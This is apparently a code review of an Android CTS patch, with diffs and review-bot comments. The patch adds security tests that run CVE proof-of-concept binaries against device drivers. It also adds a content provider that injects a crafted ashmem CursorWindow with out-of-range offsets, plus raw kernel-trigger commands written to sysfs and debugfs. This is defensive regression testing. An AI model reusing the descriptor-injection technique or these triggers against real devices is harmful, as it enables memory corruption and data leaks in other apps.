+        if(containsDriver(getDevice(), "/dev/nvhost-gpu") ||
+              containsDriver(getDevice(), "/dev/nvhost-dbg-gpu")) {
+            AdbUtils.runPoc("CVE-2016-8427", getDevice(), 60);
+        }
+    }
+
+    /**
+     *  b/31993456
+     */
+    @SecurityTest
+    public void testPocCVE_2016_8428() throws Exception {
+        if(containsDriver(getDevice(), "/dev/nvmap")) {
+            AdbUtils.runPoc("CVE-2016-8428", getDevice(), 60);
+        }
+    }
+
+    /**
+     *  b/32160775
+     */
+    @SecurityTest
+    public void testPocCVE_2016_8429() throws Exception {
+        if(containsDriver(getDevice(), "/dev/nvmap")) {
+            AdbUtils.runPoc("CVE-2016-8429", getDevice(), 60);
+        }
+    }
+
+    /**
+     *  b/32225180
+     */
+    @SecurityTest
+    public void testPocCVE_2016_8430() throws Exception {
+        if(containsDriver(getDevice(), "/dev/nvhost-vic")) {
+            AdbUtils.runPoc("CVE-2016-8430", getDevice(), 60);
+        }
+    }
+
+   /**
+     *  b/32402179
+     */
+    @SecurityTest
+    public void testPocCVE_2016_8431() throws Exception {
+        if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+            AdbUtils.runPoc("CVE-2016-8431", getDevice(), 60);
+        }
+    }
+
+    /**
+     *  b/32447738
+     */
+    @SecurityTest
+    public void testPocCVE_2016_8432() throws Exception {
+        if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+            AdbUtils.runPoc("CVE-2016-8432", getDevice(), 60);
+        }
+    }
+
+    /**
+     *  b/32125137
+     */
+    @SecurityTest
+    public void testPocCVE_2016_8434() throws Exception {
+        if(containsDriver(getDevice(), "/dev/kgsl-3d0")) {
+            AdbUtils.runPoc("CVE-2016-8434", getDevice(), 60);
+        }
+    }
+
+    /**
+     *  b/32700935
+     */
+    @SecurityTest
+    public void testPocCVE_2016_8435() throws Exception {
+        enableAdbRoot(getDevice());
+        if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+            AdbUtils.runPoc("CVE-2016-8435", getDevice(), 60);
+        }
+    }
+
+    /**
+     *  b/31568617
+     */
+    @SecurityTest
+    public void testPocCVE_2016_9120() throws Exception {
+        enableAdbRoot(getDevice());
+        if(containsDriver(getDevice(), "/dev/ion")) {
+            AdbUtils.runPoc("CVE-2016-9120", getDevice(), 60);
+        }
+    }
+
+    //Highs
+    /**
+     *  b/31225246
+     */
+    @SecurityTest
+    public void testPocCVE_2016_8412() throws Exception {
+        enableAdbRoot(getDevice());
+        if(containsDriver(getDevice(), "/dev/v4l-subdev7")) {
+            AdbUtils.runPoc("CVE-2016-8412", getDevice(), 60);
+        }
+    }
+
+    /**
+     *  b/31243641
+     */
+    @SecurityTest
+    public void testPocCVE_2016_8444() throws Exception {
+        enableAdbRoot(getDevice());
+        if(containsDriver(getDevice(), "/dev/v4l-subdev17")) {
+            AdbUtils.runPoc("CVE-2016-8444", getDevice(), 60);
+        }
+    }
+
+    /**
+     *  b/31791148
+     */
+    @SecurityTest
+    public void testPocCVE_2016_8448() throws Exception {
+        enableAdbRoot(getDevice());
+        if(containsDriver(getDevice(), "/dev/graphics/fb0")) {
+            AdbUtils.runPoc("CVE-2016-8448", getDevice(), 60);
+        }
+    }
+
+    /**
+     *  b/31798848
+     */
+    @SecurityTest
+    public void testPocCVE_2016_8449() throws Exception {
+        enableAdbRoot(getDevice());
+        if(containsDriver(getDevice(), "/dev/tegra_avpchannel")) {
+            AdbUtils.runPoc("CVE-2016-8449", getDevice(), 60);
+        }
+    }
+
+    /**
+     *  b/31668540
+     */
+    @SecurityTest
+    public void testPocCVE_2016_8460() throws Exception {
+        if(containsDriver(getDevice(), "/dev/nvmap")) {
+            String result = AdbUtils.runPoc("CVE-2016-8460", getDevice(), 60);
+            assertTrue(!result.equals("Vulnerable"));
+        }
+    }
+
+    /**
+     *  b/32402548
+     */
+    @SecurityTest
+    public void testPocCVE_2017_0403() throws Exception {
+        enableAdbRoot(getDevice());
+        AdbUtils.runPoc("CVE-2017-0403", getDevice(), 60);
+    }
+
+    /**
+     *  b/32510733
+     */
+    @SecurityTest
+    public void testPocCVE_2017_0404() throws Exception {
+        enableAdbRoot(getDevice());
+        if(containsDriver(getDevice(), "/proc/asound/version")) {
+            AdbUtils.runPoc("CVE-2017-0404", getDevice(), 60);
+        }
+    }
+
+    /**
+     *  b/32178033
+     */
+    @SecurityTest
+    public void testPocCVE_2016_8451() throws Exception {
+        enableAdbRoot(getDevice());
+        String command =
+            "echo AAAAAAAAA > /sys/devices/f9924000.i2c/i2c-2/2-0070/power_control";
+        AdbUtils.runCommandLine(command, getDevice());
+    }
+
+    /**
+     *  b/32659848
+     */
+    @SecurityTest
+    public void testPoc32659848() throws Exception {
+        String command =
+            "echo 18014398509481980 > /sys/kernel/debug/tracing/buffer_size_kb";
+        AdbUtils.runCommandLine(command, getDevice());
+    }
+}
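Review bot: `assertTrue(!result.equals("Vulnerable"))` in testPocCVE_2016_8460 compares the whole collected output for exact equality, so a trailing newline or any extra line printed by the binary makes the assertion pass even when the PoC reports the device as vulnerable. Whether the PoC prints a newline is not visible here, but a substring check is the safer form: `assertFalse("CVE-2016-8460 PoC reported Vulnerable", result.contains("Vulnerable"));`. Separately, the second line of the licence header starts with `0;256;0c`, which looks like terminal escape residue and should be removed.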
diff --git a/hostsidetests/security/src/android/security/cts/Poc17_01.java b/hostsidetests/security/src/android/security/cts/Poc17_01.java
new file mode 100644
index 0000000..f8ed22a
--- /dev/null
+++ b/hostsidetests/security/src/android/security/cts/Poc17_01.java
@@ -0,0 +1,44 @@
+/**
+ * Copyright (C) 2016 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+
+@SecurityTest
+public class Poc17_01 extends SecurityTestCase {
+
+    /**
+     *  b/31799863
+     */
+    @SecurityTest
+    public void testPocCVE_2016_8482() throws Exception {
+        if(containsDriver(getDevice(), "/dev/nvmap")) {
+            AdbUtils.runPoc("CVE-2016-8482", getDevice(), 60);
+        }
+    }
+
+   /**
+     *  b/32636619
+     */
+    @SecurityTest
+    public void testPocCVE_2017_0429() throws Exception {
+        if(containsDriver(getDevice(), "/dev/nvhost-as-gpu")) {
+            enableAdbRoot(getDevice());
+            AdbUtils.runPoc("CVE-2017-0429", getDevice(), 60);
+        }
+    }
+ }
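Review bot: testPocCVE_2017_0429 calls `enableAdbRoot(getDevice())` inside the `containsDriver` branch, whereas the root-requiring tests in Poc16_12.java call it before the check. Pick one order and use it everywhere so the presence probe runs with the same privileges in every test. `enableAdbRoot` is defined outside the visible lines, so whether the order changes the probe's result is an assumption to confirm. The class's closing `}` and the second Javadoc opener are also each off by one column.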
diff --git a/hostsidetests/security/src/android/security/cts/SecurityTestCase.java b/hostsidetests/security/src/android/security/cts/SecurityTestCase.java
index b6599c1..5c84850 100644
--- a/hostsidetests/security/src/android/security/cts/SecurityTestCase.java
+++ b/hostsidetests/security/src/android/security/cts/SecurityTestCase.java
@@ -64,6 +64,17 @@
     }
 
     /**
+     * Check if a driver is present on a machine
+     */
+    public boolean containsDriver(ITestDevice mDevice, String driver) throws Exception {
+        String result = mDevice.executeShellCommand("ls -Zl " + driver);
+        if(result.contains("No such file or directory")) {
+            return false;
+        }
+        return true;
+    }
+
+    /**
      * Makes sure the phone is online, and the ensure the current boottime is within 2 seconds
      * (due to rounding) of the previous boottime to check if The phone has crashed.
      */
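Review bot: The Javadoc for `containsDriver` does not say that the check is a negative match on `ls` output: anything other than the text "No such file or directory" (a permission error, an empty result) counts as present. That is probably intended, so that the PoC still runs when in doubt, but it should be stated, along with `@param driver absolute path of the device node; concatenated unquoted into a shell command, so callers must pass trusted constants`. The body can be reduced to `return !result.contains("No such file or directory");`. The parameter name `mDevice` uses the member-field prefix; `device` would match AdbUtils.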
diff --git a/hostsidetests/services/activitymanager/app/AndroidManifest.xml b/hostsidetests/services/activitymanager/app/AndroidManifest.xml
index 2804d3b..6e9aead 100755
--- a/hostsidetests/services/activitymanager/app/AndroidManifest.xml
+++ b/hostsidetests/services/activitymanager/app/AndroidManifest.xml
@@ -159,8 +159,6 @@
             android:exported="true"
             android:launchMode="singleInstance"
         />
-        <activity android:name=".MultiWindowSupportObserver"
-            android:exported="true" />
     </application>
 </manifest>
 
diff --git a/hostsidetests/services/activitymanager/app/src/android/server/app/MultiWindowSupportObserver.java b/hostsidetests/services/activitymanager/app/src/android/server/app/MultiWindowSupportObserver.java
deleted file mode 100644
index 0d54912..0000000
--- a/hostsidetests/services/activitymanager/app/src/android/server/app/MultiWindowSupportObserver.java
+++ /dev/null
@@ -1,18 +0,0 @@
-package android.server.app;
-
-import android.app.Activity;
-import android.content.res.Resources;
-import android.os.Bundle;
-import android.util.Log;
-
-public class MultiWindowSupportObserver extends Activity {
-    @Override
-    protected void onCreate(Bundle savedInstanceState) {
-        super.onCreate(savedInstanceState);
-        int id = Resources.getSystem().getIdentifier("config_supportsMultiWindow", "bool", "android");
-        boolean support = Resources.getSystem().getBoolean(id);
-        Log.i(getClass().getSimpleName(), "HEAD=OK");
-        Log.i(getClass().getSimpleName(), "DROP=OK");
-        Log.i(getClass().getSimpleName(), "config_supportsMultiWindow="+support);
-    }
-}
diff --git a/hostsidetests/services/activitymanager/src/android/server/cts/ActivityManagerTestBase.java b/hostsidetests/services/activitymanager/src/android/server/cts/ActivityManagerTestBase.java
index 09bb294..3a21fda 100644
--- a/hostsidetests/services/activitymanager/src/android/server/cts/ActivityManagerTestBase.java
+++ b/hostsidetests/services/activitymanager/src/android/server/cts/ActivityManagerTestBase.java
@@ -26,9 +26,7 @@
 import java.lang.Exception;
 import java.lang.Integer;
 import java.lang.String;
-import java.util.HashMap;
 import java.util.HashSet;
-import java.util.Map;
 import java.util.regex.Matcher;
 import java.util.regex.Pattern;
 
@@ -80,11 +78,6 @@
     protected ITestDevice mDevice;
 
     private HashSet<String> mAvailableFeatures;
-    final private String RESULT_KEY_HEAD = "HEAD";
-    final private String SUPPORT_OBSERVER = "MultiWindowSupportObserver";
-    private static boolean mConfigLoaded = false;
-    private static boolean mSupportMultiWindow = true;
-
 
     protected static String getAmStartCmd(final String activityName) {
         return "am start -n " + getActivityComponentName(activityName);
@@ -225,68 +218,6 @@
                 || PRETEND_DEVICE_SUPPORTS_FREEFORM;
     }
 
-    protected boolean supportsMultiWindowMode() {
-        if (!mConfigLoaded) {
-            try {
-                executeShellCommand("am start -n " + "android.server.app/." + SUPPORT_OBSERVER);
-                waitForResume("android.server.app", SUPPORT_OBSERVER);
-                Map map = getLogResults(SUPPORT_OBSERVER);
-                String value = (String)map.get(RESULT_KEY_HEAD);
-                if (value != null && value.equals("OK")) {
-                    mConfigLoaded = true;
-                    mSupportMultiWindow = !map.get("config_supportsMultiWindow").equals("false");
-                }
-                executeShellCommand(AM_FORCE_STOP_TEST_PACKAGE);
-                clearLogs();
-            } catch (Exception e) {
-                e.printStackTrace();
-            }
-        }
-        return mSupportMultiWindow;
-    }
-
-    private void clearLogs() throws DeviceNotAvailableException {
-        executeShellCommand("logcat -c");
-    }
-
-    private Map<String, String> getLogResults(String className) throws Exception {
-        int retryCount = 3;
-        Map<String, String> output = new HashMap<String, String>();
-        do {
-
-            String logs = executeShellCommand("logcat -v brief -d " + className + ":I" + " *:S");
-            for (String line : logs.split("\\n")) {
-                if (line.startsWith("I/" + className)) {
-                    String payload = line.split(":")[1].trim();
-                    final String[] split = payload.split("=");
-                    if (split.length > 1) {
-                        output.put(split[0], split[1]);
-                    }
-                }
-            }
-            if (output.containsKey(RESULT_KEY_HEAD)) {
-                return output;
-            }
-        } while (retryCount-- > 0);
-        return output;
-    }
-
-    private void waitForResume(String packageName, String activityName) throws Exception {
-        final String fullActivityName = packageName + "." + activityName;
-        int retryCount = 3;
-        do {
-            Thread.sleep(500);
-            String logs = executeShellCommand("logcat -d -b events");
-            for (String line : logs.split("\\n")) {
-                if(line.contains("am_on_resume_called") && line.contains(fullActivityName)) {
-                    return;
-                }
-            }
-        } while (retryCount-- > 0);
-
-        throw new Exception(fullActivityName + " has failed to start");
-    }
-
     protected boolean hasDeviceFeature(String requiredFeature) throws DeviceNotAvailableException {
         if (mAvailableFeatures == null) {
             // TODO: Move this logic to ITestDevice.
diff --git a/hostsidetests/services/windowmanager/dndsourceapp/AndroidManifest.xml b/hostsidetests/services/windowmanager/dndsourceapp/AndroidManifest.xml
index a45b62f..296a979 100644
--- a/hostsidetests/services/windowmanager/dndsourceapp/AndroidManifest.xml
+++ b/hostsidetests/services/windowmanager/dndsourceapp/AndroidManifest.xml
@@ -23,8 +23,7 @@
                 <category android:name="android.intent.category.LAUNCHER"/>
             </intent-filter>
         </activity>
-        <activity android:name=".MultiWindowSupportObserver"
-            android:exported="true"/>
+
         <provider android:name="android.wm.cts.dndsourceapp.DragSourceContentProvider"
                   android:authorities="android.wm.cts.dndsource.contentprovider"
                   android:grantUriPermissions="true"/>
diff --git a/hostsidetests/services/windowmanager/dndsourceapp/src/android/wm/cts/dndsourceapp/MultiWindowSupportObserver.java b/hostsidetests/services/windowmanager/dndsourceapp/src/android/wm/cts/dndsourceapp/MultiWindowSupportObserver.java
deleted file mode 100644
index b8bd3c6..0000000
--- a/hostsidetests/services/windowmanager/dndsourceapp/src/android/wm/cts/dndsourceapp/MultiWindowSupportObserver.java
+++ /dev/null
@@ -1,18 +0,0 @@
-package android.wm.cts.dndsourceapp;
-
-import android.app.Activity;
-import android.content.res.Resources;
-import android.os.Bundle;
-import android.util.Log;
-
-public class MultiWindowSupportObserver extends Activity {
-    @Override
-    protected void onCreate(Bundle savedInstanceState) {
-        super.onCreate(savedInstanceState);
-        int id = Resources.getSystem().getIdentifier("config_supportsMultiWindow", "bool", "android");
-        boolean support = Resources.getSystem().getBoolean(id);
-        Log.i(getClass().getSimpleName(), "HEAD=OK");
-        Log.i(getClass().getSimpleName(), "DROP=OK");
-        Log.i(getClass().getSimpleName(), "config_supportsMultiWindow="+support);
-    }
-}
diff --git a/hostsidetests/services/windowmanager/src/android/wm/cts/CrossAppDragAndDropTests.java b/hostsidetests/services/windowmanager/src/android/wm/cts/CrossAppDragAndDropTests.java
index b63b633..8fc3264 100644
--- a/hostsidetests/services/windowmanager/src/android/wm/cts/CrossAppDragAndDropTests.java
+++ b/hostsidetests/services/windowmanager/src/android/wm/cts/CrossAppDragAndDropTests.java
@@ -52,10 +52,7 @@
     private static final String SOURCE_PACKAGE_NAME = "android.wm.cts.dndsourceapp";
     private static final String TARGET_PACKAGE_NAME = "android.wm.cts.dndtargetapp";
     private static final String TARGET_23_PACKAGE_NAME = "android.wm.cts.dndtargetappsdk23";
-    private static boolean mConfigLoaded = false;
-    private final String SUPPORT_OBSERVER = "MultiWindowSupportObserver";
-    private static boolean mSupportMultiWindow = true;
-    private final String AM_FORCE_STOP_TEST_PACKAGE = "am force-stop android.wm.cts.dndsourceapp";
+
 
     private static final String SOURCE_ACTIVITY_NAME = "DragSource";
     private static final String TARGET_ACTIVITY_NAME = "DropTarget";
@@ -212,16 +209,8 @@
         mDevice.executeShellCommand(AM_STACK_LIST, outputReceiver);
         final String output = outputReceiver.getOutput();
         for (String line : output.split("\\n")) {
-            final String truncatedLine;
-            // Only look for the activity name before the "topActivity" string.
-            final int pos = line.indexOf("topActivity");
-            if (pos > 0) {
-                truncatedLine = line.substring(0, pos);
-            } else {
-                truncatedLine = line;
-            }
-            if (truncatedLine.contains(name)) {
-                return truncatedLine;
+            if (line.contains(name)) {
+                return line;
             }
         }
         return "";
@@ -396,23 +385,4 @@
     public void testGrantWriteRequestWrite() throws Exception {
         doTestDragAndDrop(GRANT_WRITE, REQUEST_WRITE, RESULT_OK);
     }
-    protected boolean supportsMultiWindowMode() {
-        if (!mConfigLoaded) {
-            try {
-                executeShellCommand("am start -n " + "android.wm.cts.dndsourceapp/." + SUPPORT_OBSERVER);
-                waitForResume("android.wm.cts.dndsourceapp", SUPPORT_OBSERVER);
-                Map map = getLogResults(SUPPORT_OBSERVER);
-                String value = (String)map.get(RESULT_KEY_DROP_RESULT);
-                if (value != null && value.equals("OK")) {
-                   mConfigLoaded = true;
-                    mSupportMultiWindow = !map.get("config_supportsMultiWindow").equals("false");
-                }
-                executeShellCommand(AM_FORCE_STOP_TEST_PACKAGE);
-                clearLogs();
-            } catch (Exception e) {
-                e.printStackTrace();
-            }
-        }
-        return mSupportMultiWindow;
-    }
 }
diff --git a/hostsidetests/theme/assets/24/560dpi.zip b/hostsidetests/theme/assets/24/560dpi.zip
index 9a65c38..a171f7c 100644
--- a/hostsidetests/theme/assets/24/560dpi.zip
+++ b/hostsidetests/theme/assets/24/560dpi.zip
Binary files differ
diff --git a/hostsidetests/theme/assets/24/mdpi.zip b/hostsidetests/theme/assets/24/mdpi.zip
deleted file mode 100755
index 6e4528f..0000000
--- a/hostsidetests/theme/assets/24/mdpi.zip
+++ /dev/null
Binary files differ
diff --git a/tests/tests/content/Android.mk b/tests/tests/content/Android.mk
index d901926..98d067a 100644
--- a/tests/tests/content/Android.mk
+++ b/tests/tests/content/Android.mk
@@ -21,6 +21,8 @@
 # and when built explicitly put it in the data partition
 LOCAL_MODULE_PATH := $(TARGET_OUT_DATA_APPS)
 
+LOCAL_JNI_SHARED_LIBRARIES := libnativecursorwindow_jni libnativehelper_compat_libc++
+
 LOCAL_JAVA_LIBRARIES := android.test.runner
 
 LOCAL_STATIC_JAVA_LIBRARIES :=  android-support-v4 \
@@ -46,3 +48,5 @@
 LOCAL_COMPATIBILITY_SUITE := cts
 
 include $(BUILD_CTS_PACKAGE)
+
+include $(call all-makefiles-under,$(LOCAL_PATH))
diff --git a/tests/tests/content/AndroidManifest.xml b/tests/tests/content/AndroidManifest.xml
index d4f203e..040eafa 100644
--- a/tests/tests/content/AndroidManifest.xml
+++ b/tests/tests/content/AndroidManifest.xml
@@ -219,6 +219,13 @@
             </intent-filter>
         </activity>
 
+        <provider
+                android:name="android.content.cts.CursorWindowContentProvider"
+                android:authorities="cursorwindow.provider"
+                android:exported="true"
+                android:process=":providerProcess">
+        </provider>
+
     </application>
 
     <instrumentation android:name="android.support.test.runner.AndroidJUnitRunner"
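Review bot: The new provider is declared `android:exported="true"` with no `android:permission`, so any app on the device can query `cursorwindow.provider` while the test APK is installed. The only caller visible in this change, ContentProviderCursorWindowTest, lives in the same package, so `android:exported="false"` should be enough even with the separate `:providerProcess`. If the export is needed for a reason not visible here, a comment in the manifest saying so would help.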
diff --git a/tests/tests/content/jni/Android.mk b/tests/tests/content/jni/Android.mk
new file mode 100644
index 0000000..4737b35
--- /dev/null
+++ b/tests/tests/content/jni/Android.mk
@@ -0,0 +1,30 @@
+# Copyright (C) 2017 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#      http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH:= $(call my-dir)
+
+include $(CLEAR_VARS)
+
+LOCAL_MODULE := libnativecursorwindow_jni
+
+# Don't include this package in any configuration by default.
+LOCAL_MODULE_TAGS := optional
+
+LOCAL_SRC_FILES := NativeCursorWindow.c
+
+LOCAL_C_INCLUDES := $(JNI_H_INCLUDE)
+
+LOCAL_SHARED_LIBRARIES := libnativehelper_compat_libc++ liblog
+LOCAL_CXX_STL := libc++_static
+include $(BUILD_SHARED_LIBRARY)
diff --git a/tests/tests/content/jni/NativeCursorWindow.c b/tests/tests/content/jni/NativeCursorWindow.c
new file mode 100644
index 0000000..a2fb92a
--- /dev/null
+++ b/tests/tests/content/jni/NativeCursorWindow.c
@@ -0,0 +1,99 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#define LOG_TAG "NativeCursorWindow"
+
+#include <jni.h>
+#include <fcntl.h>
+#include <sys/mman.h>
+#include <linux/ashmem.h>
+#include <utils/Log.h>
+
+struct Header {
+    // Offset of the lowest unused byte in the window.
+    uint32_t freeOffset;
+
+    // Offset of the first row slot chunk.
+    uint32_t firstChunkOffset;
+
+    uint32_t numRows;
+    uint32_t numColumns;
+};
+
+struct RowSlot {
+    uint32_t offset;
+};
+
+#define ROW_SLOT_CHUNK_NUM_ROWS 100
+
+struct RowSlotChunk {
+    struct RowSlot slots[ROW_SLOT_CHUNK_NUM_ROWS];
+    uint32_t nextChunkOffset;
+};
+
+/* Field types. */
+enum {
+    FIELD_TYPE_NULL = 0,
+    FIELD_TYPE_INTEGER = 1,
+    FIELD_TYPE_FLOAT = 2,
+    FIELD_TYPE_STRING = 3,
+    FIELD_TYPE_BLOB = 4,
+};
+
+/* Opaque type that describes a field slot. */
+struct FieldSlot {
+    int32_t type;
+    union {
+        double d;
+        int64_t l;
+        struct {
+            uint32_t offset;
+            uint32_t size;
+        } buffer;
+    } data;
+} __attribute((packed));
+
+JNIEXPORT jint JNICALL
+Java_android_content_cts_CursorWindowContentProvider_makeNativeCursorWindowFd(JNIEnv *env, jclass clazz,
+jint offset, jint size, jboolean isBlob) {
+    int fd = open("/dev/ashmem", O_RDWR);
+    ioctl(fd, ASHMEM_SET_NAME, "Fake CursorWindow");
+
+    ioctl(fd, ASHMEM_SET_SIZE, 1024);
+
+    void *data = mmap(NULL, 1024, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
+
+    struct Header *header = (struct Header *) data;
+    unsigned rowSlotChunkOffset = sizeof(struct Header);
+    struct RowSlotChunk *rowSlotChunk = (struct RowSlotChunk *)(data + rowSlotChunkOffset);
+    unsigned fieldSlotOffset = rowSlotChunkOffset + sizeof(struct RowSlotChunk);
+    struct FieldSlot *fieldSlot = (struct FieldSlot *) (data + fieldSlotOffset);
+
+    header->numRows = 1;
+    header->numColumns = 1;
+    header->firstChunkOffset = rowSlotChunkOffset;
+
+    rowSlotChunk->slots[0].offset = fieldSlotOffset;
+
+    fieldSlot->type = isBlob ? FIELD_TYPE_BLOB : FIELD_TYPE_STRING;
+    fieldSlot->data.buffer.offset = offset;
+    fieldSlot->data.buffer.size = size;
+
+    munmap(data, 1024);
+
+    return fd;
+
+}
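Review bot: None of the `open`, `ioctl` or `mmap` results is checked, so if `/dev/ashmem` cannot be opened or the mapping fails, the writes through `header` go through an invalid pointer and crash the provider process instead of reporting a failure. Checking each call and returning -1 keeps the failure visible to the Java caller, which would then have to treat a negative descriptor as an error (that caller is only partly visible in this diff). The file also uses `ioctl` and `uint32_t` without including `<sys/ioctl.h>` and `<stdint.h>`, and the version below needs `<unistd.h>` for `close`; these may arrive transitively, but explicit includes are safer.

```c
    int fd = open("/dev/ashmem", O_RDWR);
    if (fd < 0) {
        ALOGE("open(/dev/ashmem) failed");
        return -1;
    }
    if (ioctl(fd, ASHMEM_SET_NAME, "Fake CursorWindow") < 0 ||
            ioctl(fd, ASHMEM_SET_SIZE, 1024) < 0) {
        ALOGE("ashmem ioctl failed");
        close(fd);
        return -1;
    }

    void *data = mmap(NULL, 1024, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
    if (data == MAP_FAILED) {
        ALOGE("mmap of ashmem region failed");
        close(fd);
        return -1;
    }
    /* … unchanged: header, row slot and field slot setup, munmap … */
    return fd;
```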
diff --git a/tests/tests/content/src/android/content/cts/ContentProviderCursorWindowTest.java b/tests/tests/content/src/android/content/cts/ContentProviderCursorWindowTest.java
new file mode 100644
index 0000000..004b193
--- /dev/null
+++ b/tests/tests/content/src/android/content/cts/ContentProviderCursorWindowTest.java
@@ -0,0 +1,54 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License
+ */
+
+package android.content.cts;
+
+import android.database.Cursor;
+import android.database.sqlite.SQLiteException;
+import android.net.Uri;
+import android.test.AndroidTestCase;
+import android.util.Log;
+
+import java.io.IOException;
+
+/**
+ * Test {@link CursorWindowContentProvider} .
+ */
+public class ContentProviderCursorWindowTest extends AndroidTestCase {
+    private static final String TAG = "ContentProviderCursorWindowTest";
+
+    public void testQuery() throws IOException {
+        Cursor cursor = getContext().getContentResolver().query(
+                Uri.parse("content://cursorwindow.provider/hello"),
+                null, null, null, null
+        );
+        try {
+            cursor.moveToFirst();
+
+            int type = cursor.getType(0);
+            if (type != Cursor.FIELD_TYPE_BLOB) {
+                fail("Unexpected type " + type);
+            }
+            byte[] blob = cursor.getBlob(0);
+            Log.i(TAG,  "Blob length " + blob.length);
+            fail("getBlob should fail due to invalid offset used in the field slot");
+        } catch (SQLiteException expected) {
+            Log.i(TAG, "Expected exception: " + expected);
+        } finally {
+            cursor.close();
+        }
+    }
+}
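Review bot: `cursor` is dereferenced without a null check, and `ContentResolver.query` can return null (for example when the provider process has died), in which case the test ends with a NullPointerException instead of a readable failure. Add `assertNotNull("provider returned no cursor", cursor);` before the `try`. The result of `cursor.moveToFirst()` is also ignored; `assertTrue(cursor.moveToFirst());` would make sure the test really reaches the malformed field slot before it expects the `SQLiteException`.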
diff --git a/tests/tests/content/src/android/content/cts/CursorWindowContentProvider.java b/tests/tests/content/src/android/content/cts/CursorWindowContentProvider.java
new file mode 100644
index 0000000..4266f35
--- /dev/null
+++ b/tests/tests/content/src/android/content/cts/CursorWindowContentProvider.java
@@ -0,0 +1,130 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License
+ */
+
+package android.content.cts;
+
+import android.annotation.NonNull;
+import android.annotation.Nullable;
+import android.content.ContentProvider;
+import android.content.ContentValues;
+import android.database.AbstractWindowedCursor;
+import android.database.Cursor;
+import android.database.CursorWindow;
+import android.net.Uri;
+import android.os.Parcel;
+import android.os.ParcelFileDescriptor;
+import android.util.Log;
+
+/**
+ * Content provider that uses a custom {@link CursorWindow} to inject file descriptor
+ * pointing to another ashmem region having window slots with references outside of allowed ranges.
+ *
+ * <p>Used in {@link ContentProviderCursorWindowTest}
+ */
+public class CursorWindowContentProvider extends ContentProvider {
+    private static final String TAG = "CursorWindowContentProvider";
+    static {
+        System.loadLibrary("nativecursorwindow_jni");
+    }
+
+    @Override
+    public Cursor query(Uri uri, String[] projection, String selection,
+            String[] selectionArgs, String sortOrder) {
+        AbstractWindowedCursor cursor = new AbstractWindowedCursor() {
+            @Override
+            public int getCount() {
+                return 1;
+            }
+
+            @Override
+            public String[] getColumnNames() {
+                return new String[] {"a"};
+            }
+        };
+        cursor.setWindow(new InjectingCursorWindow("TmpWindow"));
+        return cursor;
+    }
+
+    class InjectingCursorWindow extends CursorWindow {
+        InjectingCursorWindow(String name) {
+            super(name);
+        }
+
+        @Override
+        public void writeToParcel(Parcel dest, int flags) {
+            Parcel tmp = Parcel.obtain();
+
+            super.writeToParcel(tmp, flags);
+            tmp.setDataPosition(0);
+            // Find location of file descriptor
+            int fdPos = -1;
+            while (tmp.dataAvail() > 0) {
+                fdPos = tmp.dataPosition();
+                int frameworkFdMarker = tmp.readInt();
+                if (frameworkFdMarker == 0x66642a85 /* BINDER_TYPE_FD */) {
+                    break;
+                }
+            }
+            if (fdPos == -1) {
+                tmp.recycle();
+                throw new IllegalStateException("File descriptor not found in the output of "
+                        + "CursorWindow.writeToParcel");
+            }
+            // Write reply with replaced file descriptor
+            ParcelFileDescriptor evilFd = ParcelFileDescriptor
+                    .adoptFd(makeNativeCursorWindowFd(1000, 1000, true));
+            dest.appendFrom(tmp, 0, fdPos);
+            dest.writeFileDescriptor(evilFd.getFileDescriptor());
+            tmp.setDataPosition(dest.dataPosition());
+            dest.appendFrom(tmp, dest.dataPosition(), tmp.dataAvail());
+            tmp.recycle();
+        }
+    }
+
+    private native static int makeNativeCursorWindowFd(int offset, int size, boolean isBlob);
+
+    // Stubs
+    @Override
+    public boolean onCreate() {
+        return true;
+    }
+
+    @Override
+    public int delete(Uri uri, String selection, String[] selectionArgs) {
+        Log.e(TAG, "delete() not implemented");
+        return 0;
+    }
+
+    @Override
+    public String getType(Uri uri) {
+        Log.e(TAG, "getType() not implemented");
+        return "";
